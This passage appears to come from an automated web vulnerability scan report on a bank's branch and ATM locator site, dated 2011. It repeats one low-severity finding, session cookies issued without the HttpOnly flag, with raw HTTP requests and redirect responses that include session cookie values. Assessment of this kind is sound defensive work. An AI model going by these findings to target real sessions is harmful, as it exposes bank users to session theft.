searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(1%2C'ATM-31691'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; NSC_CbolPgBnfsjdb=445b32097852; BOA_COM_BT_ELIGIBLE=No; session_start_time=1309296687564; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; throttle_value=31; cmRS=&t1=1309296062784&t2=1309296068080&t3=1309297341350&fti=1309297341350&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394&ul=http%3A//locators.bankofamerica.com/locator/locator/LocatorAction.do&rf=http%3A//learn.bankofamerica.com/articles/managing-credit/understanding-your-credit-card.html

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:55 GMT
Server: Apache
Set-Cookie: JSESSIONID=EC860CDBA4B5B4ADA965231492D1BA70.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/jsp/index.jsp?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

2.4. http://locators.bankofamerica.com/locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7894BCA611FAAB1840DF2CF8073E57E8.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TCID=0007b046-77e2-485a-acb6-a45400000014; CMAVID=70121306499602161810121; cmTPSet=Y; state=MA; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; searchPageState=%7B%22footprintMapAction%22%3A%22footprintMapAction%20('tx'%2C'o')%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(true%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(1%2C'BC-8203'%2CLigeoAPI.getSearchResultsMap()%2Cfalse%2Cnull)%3B%5C%22%2C1000)%3B%22%2C%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22hours_24%22%3A%22document.getElementById('hours_24').checked%20%3D%20true%3B%22%2C%22atm_locations%22%3A%22document.getElementById('atm_locations').checked%20%3D%20true%3B%22%2C%22inside_lobby%22%3A%22document.getElementById('inside_lobby').checked%20%3D%20true%3B%22%2C%22drive_up_atm%22%3A%22document.getElementById('drive_up_atm').checked%20%3D%20true%3B%22%2C%22accepts_deposits%22%3A%22document.getElementById('accepts_deposits').checked%20%3D%20true%3B%22%2C%22commercial_deposits%22%3A%22document.getElementById('commercial_deposits').checked%20%3D%20true%3B%22%2C%22bc_locations%22%3A%22document.getElementById('bc_locations').checked%20%3D%20true%3B%22%2C%22open_saturdays%22%3A%22document.getElementById('open_saturdays').checked%20%3D%20true%3B%22%2C%22accepts_appointments%22%3A%22document.getElementById('accepts_appointments').checked%20%3D%20true%3B%22%2C%22night_deposits%22%3A%22document.getElementById('night_deposits').checked%20%3D%20true%3B%22%2C%22drive_up_bc%22%3A%22document.getElementById('drive_up_bc').checked%20%3D%20true%3B%22%2C%22change_orders%22%3A%22document.getElementById('change_orders').checked%20%3D%20true%3B%22%7D; profilePageState=; cmRS=&t1=1309349734538&t2=1309349737587&t3=1309349749335&t4=1309349724463&lti=1309349749335&ln=&hr=http%3A//locators.bankofamerica.com/locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/&fti=&fn=UNDEFINED%3A0%3BUNDEFINED%3A1%3BUNDEFINED%3A2%3B&ac=&fd=&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394&ul=http%3A//locators.bankofamerica.com/locator/locator/LocatorAction.do&rf=http%3A//burp/show/39

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:08 GMT
Server: Apache
Set-Cookie: JSESSIONID=9ECE9BF18BDB9693A761B458EF3340A7.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

2.5. http://locators.bankofamerica.com/locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:48 GMT
Server: Apache
Set-Cookie: JSESSIONID=170E4BC4A3289D6A7FBF1D8C0F11709B.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.6. http://locators.bankofamerica.com/locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:23 GMT
Server: Apache
Set-Cookie: JSESSIONID=38ADF91345DB453508F336CF375FFA98.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.7. http://locators.bankofamerica.com/locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:32 GMT
Server: Apache
Set-Cookie: JSESSIONID=045715EE313202112DB5004391B57BE4.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.8. http://locators.bankofamerica.com/locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:53 GMT
Server: Apache
Set-Cookie: JSESSIONID=E30A5D1CAF78F5BB065EF6CC55E82B54.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.9. http://locators.bankofamerica.com/locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:45 GMT
Server: Apache
Set-Cookie: JSESSIONID=CB72DFB3C95CC16B6ABFF38CD12A0469.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/1051__Route__37__West_08755_TOMS__RIVER_NJ/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.10. http://locators.bankofamerica.com/locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=D538C612506F42462EE430A24565B7C6.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.11. http://locators.bankofamerica.com/locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:17 GMT
Server: Apache
Set-Cookie: JSESSIONID=787A7CACBFF4B8AB17A3EEB0979B5B28.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/105__East__9th_67337_COFFEYVILLE_KS/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.12. http://locators.bankofamerica.com/locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:18 GMT
Server: Apache
Set-Cookie: JSESSIONID=71E2DED5A1000AAFAE425A66267E9CC6.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.13. http://locators.bankofamerica.com/locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=8B4885567CBE362F500F25E33AF7BBA6.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.14. http://locators.bankofamerica.com/locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=0074536723657EB522B846F074BCA5F4.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.15. http://locators.bankofamerica.com/locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:32 GMT
Server: Apache
Set-Cookie: JSESSIONID=D4379207E3102F1270843C39842E6F3A.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.16. http://locators.bankofamerica.com/locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:32 GMT
Server: Apache
Set-Cookie: JSESSIONID=4CDBBB35A57E57764F8B3C276EDC9808.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.17. http://locators.bankofamerica.com/locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:14 GMT
Server: Apache
Set-Cookie: JSESSIONID=D60C2381F4B222DBA6480BDBCB6E2A38.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.18. http://locators.bankofamerica.com/locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:53 GMT
Server: Apache
Set-Cookie: JSESSIONID=2614FBC26859159490D1B9FE097EB7F0.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.19. http://locators.bankofamerica.com/locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:07 GMT
Server: Apache
Set-Cookie: JSESSIONID=3888393FBA118A96718B61CC79566D1C.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.20. http://locators.bankofamerica.com/locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:43 GMT
Server: Apache
Set-Cookie: JSESSIONID=4A6FC2101552860B19157ED774058065.ftb-web1; Path=/locator/locator
